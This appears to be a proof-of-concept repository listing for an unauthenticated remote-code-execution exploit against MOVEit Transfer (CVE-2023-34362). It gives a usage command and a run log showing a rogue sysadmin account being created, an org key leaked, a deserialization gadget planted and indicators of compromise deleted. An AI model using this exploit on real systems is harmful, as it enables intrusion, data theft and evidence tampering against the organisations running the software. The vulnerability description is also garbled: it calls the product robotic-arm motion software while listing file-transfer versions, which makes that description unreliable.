CVE-2023-34362 PoC — MoveIT SQL Injection Vulnerability

Source
Associated Vulnerability
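Title: MoveIT SQL Injection Vulnerability (CVE-2023-34362)
Description: MoveIT is a state-of-the-art software from the MoveIT company for robotic arm motion manipulation. MoveIT has a security vulnerability that stems from an SQL injection flaw. An attacker can exploit this vulnerability to access the database and perform modification or deletion operations. Affected products and versions: Progress MOVEit Transfer versions before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1).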
Description
Modified RCE with a remote shell and logging
Readme
# CVE-2023-34362: MOVEit Transfer Unauthenticated RCE

For a full technical description of the vulnerability and exploitation, please read our [AttackerKB Analysis](https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis).

## Usage

```
ruby move.rb <TARGET_IP>
```

```
>ruby move.rb 192.168.86.111
[+] Starting. target='https://192.168.86.111'.
[+] Retrieved initial session token '3el524tvmjs4iceurhm1r2cq' and InstID '8937'.
[+] Creating new sysadmin account: username='WZHTXMOU', userlogin='NMMLJIIP', password='LUOZFAIB'.
[+] Got API access token='3k2Bs4DBE-5YhK4kBr9HoALoGm4UIsOEg-KYMC6kcB3hwtncbiW-FCrvyXu9JuLgaXBzBg9SeX-GaykQHXWE1R4FBK9G-koUKmGB4u34LNzio3mzMDPA3deCNjGVHOkeIPbHdkcH7BouMlUtFcI0PwRt2frY0z6jBxlpXwVr4GqprxTT8lBnqTRsTpq75Mw0g5WudKvqsIa7z7HH0kq7okp7OVH8M5ABWXiFQ0l2vS9ZlXMwuV9o-1LKt1_nFJjLMtUHGn6mNzMinge774X1gOXGws2Qpjl32PlmRShx2GX0yGb8NYsin_JpJeTI-6BFzS6tJbq_UFtKaoND9WH4oZS5sLW2SHlRPNsJIfBrsi6fYKRLewKThQ'.
[+] Found folderId '963580724'.
[+] Initiated resumable file upload for fileId '966492920'...
[+] Leaked the Org Key: 0B 52 CA 0B FA 01 6F 19 5E D3 61 B1 B9 2A DA 75
[+] Using deserialization gadget:
[+] Encrypted the gadget with Org Key: @%!
[+] Planting encrypted gadget into the DB...
[+] Triggering gadget deserialization...
[+] Gadget deserialized, RCE Achieved!
[+] Deleating IoC's from the DB...
[+] Finished.
```
File Snapshot

```
[4.0K] /data/pocs/146a37f7e07b6a987ae3aadc012b2845d1c3355d
├── [2.3K] moveit_transfer_cve-2023-34362.nse
├── [ 13K] move.rb
└── [4.2K] README.md

0 directories, 3 files
```